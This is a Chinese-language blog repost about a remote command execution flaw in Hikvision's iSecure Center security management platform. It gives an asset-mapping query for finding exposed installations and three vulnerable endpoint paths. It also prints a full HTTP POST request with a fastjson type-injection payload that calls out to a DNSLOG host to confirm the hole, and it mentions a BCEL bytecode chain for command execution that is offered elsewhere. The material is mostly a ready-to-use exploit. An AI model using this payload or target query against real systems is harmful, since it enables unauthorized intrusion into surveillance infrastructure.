首页 > 其他分享 >海康威视iSecure-Center 综合安防管理平台 applyAutoLoginTicket/keepAlive/applyCT 远程命令执行漏洞

海康威视iSecure-Center 综合安防管理平台 applyAutoLoginTicket/keepAlive/applyCT 远程命令执行漏洞

时间:2024-06-13 12:58:39浏览次数:7  
标签:Center 威视 applyAutoLoginTicket 安防 bic v1 ssoService iSecure

0x01 漏洞描述

海康威视iSecure Center综合安防管理平台是一套集成化、智能化的安防管理系统。

海康威视iSecure Center综合安防管理平台存在远程命令执行漏洞,可造成远程命令执行。

0x02 资产测绘

app="HIKVISION-综合安防管理平台" ||app="HIKVISION-iSecure-Center"

0x03 漏洞复现

使用DNSLOG进行漏洞检测,三个路径都可以

/bic/ssoService/v1/applyAutoLoginTicket

/bic/ssoService/v1/keepAlive

/bic/ssoService/v1/applyCT

POST /bic/ssoService/v1/applyAutoLoginTicket HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)
Content-Length: 3330
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: close

{"CTGT":{ "a": {"@type":"java.net.InetSocketAddress"{"address":,"val":"bx0art.dnslog.cn"}}}}

也可通过BCEL链加载字节码实现回显命令执行(星球内自取)

0x04 知识星球

标签:Center,威视,applyAutoLoginTicket,安防,bic,v1,ssoService,iSecure
From: https://blog.csdn.net/WuYSec/article/details/139622039

相关文章

  • teamcenter 按照审批节点和节点的目标分组统计任务数量
    selectcount(*),--(case--when'L8_DesignRevision'then'图对象'--when'L8_DocumentRevision'then'文档'--when'L8_JcsjDocumentRevision'then'检测数据'--WHENINSTR(v.pobject_type,'PartRevi......
  • 我见我思之hvv偷师学艺——Vmware vcenter未授权任意文件上传(CVE-2021-21972)
    本文为个人整理内容,大部分东西都是参考其它师傅的文章,具体如下:https://blog.csdn.net/qq_37602797/article/details/114109428https://blog.csdn.net/tigerman20201/article/details/129098137常见告警特征:漏洞类型:文件上传。poc利用接口为:/ui/vropspluginui/rest/servic......
  • Teamcenter 查询关系的最新版本
    selectpi.pitem_id,pws.pobject_desc,pir.pitem_revision_id,pit.ptype_name,pi1.pitem_id,pir1.pitem_revision_id,pws1.pobject_descfrominfodba.pitemrevisionpirjoininfodba.pitempionpir.ritems_tagu=pi.puid--ANDpi.PITEM_ID='12200560006'joi......
  • Teamcenter 《BMIDE复合属性应用》
    需求ItemRevision的命名需要把版本主属性表单or其他表单中的属性显示在DisplayName中打开BMIDE找到对应的ItemRevision增加复合属性(ItemRevison)增加其他关系的复合属性增加其他表单增加的表单中的复合属性看ItemRevision中最后的属性其他复合属性a2_user......
  • 海康威视工业相机通过MVS修改IP
    相机型号:修改IP点开MVS软件后,左侧GigE会出现网卡的静态IP,如图想要修改相机IP,首先需要修改电脑的网络设置,设置成自己想要的IP段修改好之后,相机的图标会变为黄色感叹号,表示不能连接此时双击相机,则可设置IP(IP段始终和电脑网卡的IP段保持一致,不能跨段设置)查......
  • WPF Image enlarge via MouseWheel, selected image center does not shift
    //xaml<Windowx:Class="WpfApp123.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mi......
  • 汉中海康威视门禁多少钱,海康门禁价格一览表
    汉中海康威视门禁多少钱,海康门禁价格一览表      海康威视是国内较知名的智能安防设备生产企业,海康威视门禁机产品型号有AU5230MFW、AU5230MW、AU5270MFW、AU5270MW、AU5240MW、AU5240M等;海康威视AU5230MFW门禁机海康威视功能价格HST-AU5230MFW带人脸识......
  • [基础]tfcenter mount将Webdav服务挂载成本地磁盘(可显示使用空间)
    1、下载tfcentermount软件(1)点击官网 tfcenter官网 后下载挂载软件(2)以windows挂载为例,下载windows软件包(3)解压软件包,如下图所示2、配置tfcenter挂载(1)以管理员方式运行上图的tfcenter-mount.bat文件选择1安装tfcentermount服务到系统中选择3启动tfcentermount服务......
  • Center of Mass
     -foranarc:$\frac{r\sin\theta}{\theta}$fromthecentremoment:$\int_{-\theta}^\thetar\cos\theta\cdotr{\rmd}\theta=r^2\cdot[\sin\theta]|_{-\theta}^\theta=2r^2\sin\theta$mass:$2r\theta$so$2r^2\sin\theta\div2r\theta=\fr......
  • 【VMware vCenter】在不重启的情况下重置vCenter Server的root密码。
    VMware提供了一种方法,可以在不用重新启动vCenterServer进入grub引导至单用户模式的情况下重置root的密码,这种方法使用的是通过SSO管理员账号([email protected])登录到vCenterServer的VAMI管理界面,在右上角的操作菜单里提供更改root用户密码的选项。但是,上述方法仅适......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99